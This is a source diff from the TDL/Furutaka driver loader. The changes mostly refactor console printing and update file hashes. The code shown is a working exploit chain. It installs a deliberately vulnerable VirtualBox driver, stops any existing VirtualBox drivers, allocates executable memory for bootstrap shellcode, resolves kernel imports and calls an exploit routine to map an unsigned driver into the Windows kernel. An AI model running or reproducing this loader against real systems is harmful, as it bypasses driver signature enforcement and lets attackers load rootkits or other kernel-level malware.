cuiPrintText(g_ConOut, TEXT("Ldr: Loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Loading ntoskrnl.exe"), TRUE);
RtlInitUnicodeString(&uStr, L"ntoskrnl.exe"); RtlInitUnicodeString(&uStr, L"ntoskrnl.exe");
status = LdrLoadDll(NULL, NULL, &uStr, (PVOID)&KernelImage); status = LdrLoadDll(NULL, NULL, &uStr, (PVOID*)&KernelImage);
if ((!NT_SUCCESS(status)) || (KernelImage == 0)) { if ((!NT_SUCCESS(status)) || (KernelImage == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error while loading ntoskrnl.exe"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Error while loading ntoskrnl.exe"), TRUE);
break; break;
} }
else { else {
_strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x")); _strcpy(text, TEXT("Ldr: ntoskrnl.exe loaded at 0x"));
u64tohex(KernelImage, _strend(text)); u64tohex(KernelImage, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
RtlInitString(&routineName, "ExAllocatePoolWithTag"); RtlInitString(&routineName, "ExAllocatePoolWithTag");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xExAllocatePoolWithTag); status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID*)&xExAllocatePoolWithTag);
if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) { if ((!NT_SUCCESS(status)) || (xExAllocatePoolWithTag == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Error, ExAllocatePoolWithTag address not found"), TRUE);
break; break;
} }
else { else {
_strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x")); _strcpy(text, TEXT("Ldr: ExAllocatePoolWithTag 0x"));
u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text)); u64tohex(KernelBase + (xExAllocatePoolWithTag - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
if (g_NtBuildNumber < 15063) { if (g_NtBuildNumber < 15063) {
RtlInitString(&routineName, "PsCreateSystemThread"); RtlInitString(&routineName, "PsCreateSystemThread");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xPsCreateSystemThread); status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID*)&xPsCreateSystemThread);
if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) { if ((!NT_SUCCESS(status)) || (xPsCreateSystemThread == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, PsCreateSystemThread address not found"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Error, PsCreateSystemThread address not found"), TRUE);
break; break;
} }
else { else {
_strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x")); _strcpy(text, TEXT("Ldr: PsCreateSystemThread 0x"));
u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text)); u64tohex(KernelBase + (xPsCreateSystemThread - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
RtlInitString(&routineName, "ZwClose"); RtlInitString(&routineName, "ZwClose");
status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID)&xZwClose); status = LdrGetProcedureAddress((PVOID)KernelImage, &routineName, 0, (PVOID*)&xZwClose);
if ((!NT_SUCCESS(status)) || (xZwClose == 0)) { if ((!NT_SUCCESS(status)) || (xZwClose == 0)) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, ZwClose address not found"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Error, ZwClose address not found"), TRUE);
break; break;
} }
else { else {
_strcpy(text, TEXT("Ldr: ZwClose 0x")); _strcpy(text, TEXT("Ldr: ZwClose 0x"));
u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text)); u64tohex(KernelBase + (xZwClose - KernelImage), _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
} }
memIO = isz + PAGE_SIZE; memIO = isz + PAGE_SIZE;
NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID)&Buffer, 0, &memIO, NtAllocateVirtualMemory(NtCurrentProcess(), (PVOID*)&Buffer, 0, &memIO,
MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (Buffer == NULL) { if (Buffer == NULL) {
cuiPrintText(g_ConOut, TEXT("Ldr: Error, unable to allocate shellcode"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Error, unable to allocate shellcode"), TRUE);
break; break;
} }
else { else {
_strcpy(text, TEXT("Ldr: Shellcode allocated at 0x")); _strcpy(text, TEXT("Ldr: Shellcode allocated at 0x"));
u64tohex((ULONG_PTR)Buffer, _strend(text)); u64tohex((ULONG_PTR)Buffer, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
} }
// mov rcx, ExAllocatePoolWithTag // mov rcx, ExAllocatePoolWithTag
@ -516,20 +512,20 @@ UINT TDLMapDriver(
if (g_NtBuildNumber < 15063) { if (g_NtBuildNumber < 15063) {
RtlCopyMemory(Buffer + prologueSize, RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code)); TDLBootstrapLoader_code, sizeof(TDLBootstrapLoader_code));
cuiPrintText(g_ConOut, TEXT("Ldr: Default bootstrap shellcode selected"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Default bootstrap shellcode selected"), TRUE);
} }
else { else {
RtlCopyMemory(Buffer + prologueSize, RtlCopyMemory(Buffer + prologueSize,
TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2)); TDLBootstrapLoader_code_w10rs2, sizeof(TDLBootstrapLoader_code_w10rs2));
cuiPrintText(g_ConOut, TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Windows 10 RS2+ bootstrap shellcode selected"), TRUE);
} }
RtlCopyMemory(Buffer + dataOffset, Image, isz); RtlCopyMemory(Buffer + dataOffset, Image, isz);
cuiPrintText(g_ConOut, TEXT("Ldr: Resolving kernel import"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Resolving kernel import"), TRUE);
TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase); TDLResolveKernelImport((ULONG_PTR)Buffer + dataOffset, KernelImage, KernelBase);
cuiPrintText(g_ConOut, TEXT("Ldr: Executing exploit"), g_ConsoleOutput, TRUE); cuiPrintText(TEXT("Ldr: Executing exploit"), TRUE);
TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset); TDLExploit(Buffer, isz + PAGE_SIZE, dataOffset);
result = 0; result = 0;
break; break;
@ -537,7 +533,7 @@ UINT TDLMapDriver(
if (Buffer != NULL) { if (Buffer != NULL) {
memIO = 0; memIO = 0;
NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &memIO, MEM_RELEASE); NtFreeVirtualMemory(NtCurrentProcess(), (PVOID*)&Buffer, &memIO, MEM_RELEASE);
} }
return result; return result;
@ -568,11 +564,7 @@ HANDLE TDLStartVulnerableDriver(
//lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere. //lets give scm nice looking path so this piece of shit code from early 90x wont fuckup somewhere.
RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName));
if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) {
cuiPrintText(TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), TRUE);
cuiPrintText(g_ConOut,
TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"),
g_ConsoleOutput, TRUE);
break; break;
} }
@ -581,39 +573,37 @@ HANDLE TDLStartVulnerableDriver(
SC_MANAGER_ALL_ACCESS SC_MANAGER_ALL_ACCESS
); );
if (schSCManager == NULL) { if (schSCManager == NULL) {
cuiPrintText(g_ConOut, cuiPrintText(TEXT("Ldr: Error opening SCM database"), TRUE);
TEXT("Ldr: Error opening SCM database"),
g_ConsoleOutput, TRUE);
break; break;
} }
//lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive //lookup main vbox driver device, if found, try to unload all possible, unload order is sensitive
if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { if (supIsObjectExists(L"\\Device", L"VBoxDrv")) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), cuiPrintText(TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), TRUE);
g_ConsoleOutput, TRUE);
if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetAdp driver unloaded"), cuiPrintText(TEXT("SCM: VBoxNetAdp driver unloaded"), TRUE);
g_ConsoleOutput, TRUE);
} }
if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxNetLwf driver unloaded"), cuiPrintText(TEXT("SCM: VBoxNetLwf driver unloaded"), TRUE);
g_ConsoleOutput, TRUE);
} }
if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxUSBMon driver unloaded"), cuiPrintText(TEXT("SCM: VBoxUSBMon driver unloaded"), TRUE);
g_ConsoleOutput, TRUE);
} }
Sleep(1000); Sleep(1000);
if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxDrv driver unloaded"), cuiPrintText(TEXT("SCM: VBoxDrv driver unloaded"), TRUE);
g_ConsoleOutput, TRUE);
} }
} }
@ -623,9 +613,10 @@ HANDLE TDLStartVulnerableDriver(
// //
if (g_VBoxInstalled) { if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) { if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut, cuiPrintText(TEXT("Ldr: Error while doing VirtualBox driver backup"), TRUE);
TEXT("Ldr: Error while doing VirtualBox driver backup"), }
g_ConsoleOutput, TRUE); else {
cuiPrintText(TEXT("Ldr: VirtualBox driver backup done"), TRUE);
} }
} }
@ -635,11 +626,7 @@ HANDLE TDLStartVulnerableDriver(
(SIZE_T)DataSize, FALSE, FALSE); (SIZE_T)DataSize, FALSE, FALSE);
if (bytesIO != DataSize) { if (bytesIO != DataSize) {
cuiPrintText(TEXT("Ldr: Error writing VirtualBox on disk"), TRUE);
cuiPrintText(g_ConOut,
TEXT("Ldr: Error writing VirtualBox on disk"),
g_ConsoleOutput, TRUE);
break; break;
} }
@ -661,7 +648,7 @@ HANDLE TDLStartVulnerableDriver(
msg = TEXT("SCM: Vulnerable driver load failure"); msg = TEXT("SCM: Vulnerable driver load failure");
} }
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); cuiPrintText(msg, TRUE);
break; break;
} }
@ -689,9 +676,7 @@ void TDLStopVulnerableDriver(
UNICODE_STRING uStr; UNICODE_STRING uStr;
OBJECT_ATTRIBUTES ObjectAttributes; OBJECT_ATTRIBUTES ObjectAttributes;
cuiPrintText(g_ConOut, cuiPrintText(TEXT("SCM: Unloading vulnerable driver"), TRUE);
TEXT("SCM: Unloading vulnerable driver"),
g_ConsoleOutput, TRUE);
if (g_hVBox != INVALID_HANDLE_VALUE) if (g_hVBox != INVALID_HANDLE_VALUE)
CloseHandle(g_hVBox); CloseHandle(g_hVBox);
@ -702,9 +687,7 @@ void TDLStopVulnerableDriver(
); );
if (schSCManager == NULL) { if (schSCManager == NULL) {
cuiPrintText(g_ConOut, cuiPrintText(TEXT("SCM: Cannot open database, unable unload driver"), TRUE);
TEXT("SCM: Cannot open database, unable unload driver"),
g_ConsoleOutput, TRUE);
return; return;
} }
@ -714,7 +697,7 @@ void TDLStopVulnerableDriver(
else else
msg = TEXT("SCM: Unexpected error while unloading driver"); msg = TEXT("SCM: Unexpected error while unloading driver");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); cuiPrintText(msg, TRUE);
//if VBox not installed - remove from scm database and delete file //if VBox not installed - remove from scm database and delete file
if (g_VBoxInstalled == FALSE) { if (g_VBoxInstalled == FALSE) {
@ -724,7 +707,7 @@ void TDLStopVulnerableDriver(
else else
msg = TEXT("SCM: Error removing driver entry from registry"); msg = TEXT("SCM: Error removing driver entry from registry");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); cuiPrintText(msg, TRUE);
uStr.Buffer = NULL; uStr.Buffer = NULL;
uStr.Length = 0; uStr.Length = 0;
@ -736,17 +719,17 @@ void TDLStopVulnerableDriver(
else else
msg = TEXT("Ldr: Error removing driver file"); msg = TEXT("Ldr: Error removing driver file");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); cuiPrintText(msg, TRUE);
} }
else { else {
//VBox software present, restore original driver and exit //VBox software present, restore original driver and exit
if (supBackupVBoxDrv(TRUE)) if (supBackupVBoxDrv(TRUE))
msg = TEXT("Ldr: Original driver restored"); msg = TEXT("Ldr: Original VirtualBox driver restored from backup");
else else
msg = TEXT("Ldr: Unexpected error while restoring original driver"); msg = TEXT("Ldr: Unexpected error while restoring original driver from backup");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); cuiPrintText(msg, TRUE);
} }
CloseServiceHandle(schSCManager); CloseServiceHandle(schSCManager);
} }
@ -772,9 +755,7 @@ UINT TDLProcessCommandLine(
RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));
GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);
if (c == 0) { if (c == 0) {
cuiPrintText(g_ConOut, cuiPrintText(T_LOADERUSAGE, FALSE);
T_LOADERUSAGE,
g_ConsoleOutput, FALSE);
return retVal; return retVal;
} }
@ -786,9 +767,7 @@ UINT TDLProcessCommandLine(
} }
} }
else { else {
cuiPrintText(g_ConOut, cuiPrintText(TEXT("Ldr: Input file not found"), FALSE);
TEXT("Ldr: Input file not found"),
g_ConsoleOutput, FALSE);
} }
return retVal; return retVal;
} }
@ -806,43 +785,23 @@ void TDLMain()
BOOL cond = FALSE; BOOL cond = FALSE;
UINT uResult = 0; UINT uResult = 0;
DWORD dwTemp;
LONG x; LONG x;
OSVERSIONINFO osv; OSVERSIONINFO osv;
WCHAR text[256]; WCHAR text[256];
__security_init_cookie();
do { do {
g_hInstance = GetModuleHandle(NULL); g_hInstance = GetModuleHandle(NULL);
g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); cuiInitialize(FALSE, NULL);
if (g_ConOut == INVALID_HANDLE_VALUE) {
uResult = (UINT)-1;
break;
}
g_ConsoleOutput = TRUE;
if (!GetConsoleMode(g_ConOut, &dwTemp)) {
g_ConsoleOutput = FALSE;
}
SetConsoleTitle(T_LOADERTITLE); SetConsoleTitle(T_LOADERTITLE);
SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
if (g_ConsoleOutput == FALSE) {
WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);
}
cuiPrintText(g_ConOut, cuiPrintText(T_LOADERINTRO, TRUE);
T_LOADERINTRO,
g_ConsoleOutput, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances); x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) { if (x > 1) {
cuiPrintText(g_ConOut, cuiPrintText(T_LOADERRUN, FALSE);
T_LOADERRUN,
g_ConsoleOutput, FALSE);
uResult = (UINT)-1; uResult = (UINT)-1;
break; break;
} }
@ -852,9 +811,7 @@ void TDLMain()
osv.dwOSVersionInfoSize = sizeof(osv); osv.dwOSVersionInfoSize = sizeof(osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
if (osv.dwMajorVersion < 6) { if (osv.dwMajorVersion < 6) {
cuiPrintText(g_ConOut, cuiPrintText(T_LOADERUNSUP, FALSE);
T_LOADERUNSUP,
g_ConsoleOutput, FALSE);
uResult = (UINT)-1; uResult = (UINT)-1;
break; break;
} }
@ -867,19 +824,16 @@ void TDLMain()
ultostr(osv.dwMinorVersion, _strend(text)); ultostr(osv.dwMinorVersion, _strend(text));
_strcat(text, TEXT(" build ")); _strcat(text, TEXT(" build "));
ultostr(osv.dwBuildNumber, _strend(text)); ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); cuiPrintText(text, TRUE);
#if 0
// //
// If VirtualBox installed on the same machine warn user, // If VirtualBox installed on the same machine warn user,
// however this is unnecessary can lead to any conflicts. // however this is unnecessary can lead to any conflicts.
// //
g_VBoxInstalled = TDLVBoxInstalled(); g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) { if (g_VBoxInstalled) {
cuiPrintText(g_ConOut, cuiPrintText(T_VBOXDETECT, TRUE);
TEXT("Ldr: Warning, VirtualBox software installed, conflicts are possible"),
g_ConsoleOutput, TRUE);
} }
#endif
uResult = TDLProcessCommandLine(GetCommandLine()); uResult = TDLProcessCommandLine(GetCommandLine());

13060
Source/Furutaka/ntos.h
View File

File diff suppressed because it is too large Load Diff

BIN
Source/Furutaka/resource.rc
View File

Binary file not shown.

12
Source/Furutaka/sup.c
View File

@ -1,12 +1,12 @@
/******************************************************************************* /*******************************************************************************
* *
* (C) COPYRIGHT AUTHORS, 2016 - 2017 * (C) COPYRIGHT AUTHORS, 2016 - 2019
* *
* TITLE: SUP.C * TITLE: SUP.C
* *
* VERSION: 1.12 * VERSION: 1.14
* *
* DATE: 01 Dec 2017 * DATE: 05 Jan 2019
* *
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -80,7 +80,7 @@ ULONG_PTR supGetNtOsBase(
PRTL_PROCESS_MODULES miSpace; PRTL_PROCESS_MODULES miSpace;
ULONG_PTR NtOsBase = 0; ULONG_PTR NtOsBase = 0;
miSpace = supGetSystemInfo(SystemModuleInformation); miSpace = (PRTL_PROCESS_MODULES)supGetSystemInfo(SystemModuleInformation);
while (miSpace != NULL) { while (miSpace != NULL) {
NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
@ -117,7 +117,7 @@ PBYTE supQueryResourceData(
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry); status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) { if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData); status = LdrAccessResource(DllHandle, DataEntry, (PVOID*)&Data, &SizeOfData);
if (NT_SUCCESS(status)) { if (NT_SUCCESS(status)) {
if (DataSize) { if (DataSize) {
*DataSize = SizeOfData; *DataSize = SizeOfData;
@ -364,7 +364,7 @@ NTSTATUS NTAPI supEnumSystemObjects(
if (status != STATUS_BUFFER_TOO_SMALL) if (status != STATUS_BUFFER_TOO_SMALL)
break; break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); objinf = (POBJECT_DIRECTORY_INFORMATION)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL) if (objinf == NULL)
break; break;

20
TDL.sha256
View File

@ -1,6 +1,6 @@
a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys
f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys
8663927eaf8a0ebd87750d7f36f3c191c729e69ac7a63743fa1a7a0408895c50 *Compiled\Furutaka.exe 0d1e0c1e14b614ed3b156d0f43ed7cdb872cb5b967ed70c0ba501e3cbc2daca2 *Compiled\Furutaka.exe
14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln 14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln
d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters 2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
@ -13,21 +13,21 @@ d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDr
1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c 1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c
f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c 10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c 27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h 3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln 24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj fa3af80e10c1824e99fcf2e4d5cec3cb4974d1eb35035f5a62fac67a44170c68 *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user fc708eb26d32a785ab15f502140928985a1bd0113c0c9640eb25d6f2e0b4e7cd *Source\Furutaka\Furutaka.vcxproj.user
9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h 4b16411f96538d38f05b5d949710ace54839d4a9aee9dcc2a61a4b2f4dbfc9cc *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c 94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h 33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
5b8be75beb30d40561a88a6a40e306bc5477f87c453fce8e5cb464d7bc2f63e9 *Source\Furutaka\main.c 64a8028d51454e2c831a81b68fcaf7348653830c010fb190451028c302f0574e *Source\Furutaka\main.c
b29970b67a406364e4a8fef971e48383de176229a9333168bd03caa474d19e3b *Source\Furutaka\ntos.h d0debd4f7db2ef941f0b02e9d7d1b85d873f0a01dcb4537b5e112c68443aaaa6 *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
6bacf082d32cd5fcc5e787578614d871e88e5cbb5aa7161edcc4607c31a5657b *Source\Furutaka\resource.rc 530c157ddb971692aacd0252694a8a752f95c1759f6d8ae468477e0676a37d08 *Source\Furutaka\resource.rc
6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h 6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h
6ae8ca2192e5277e85a625c772092988592248dbaa444f385446202ea9e42eb5 *Source\Furutaka\sup.c fe4cf565002d1b4a33b5f5fb81c656141f6bc758c94d861391e93a089515cbf8 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h 059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h 12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h
cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys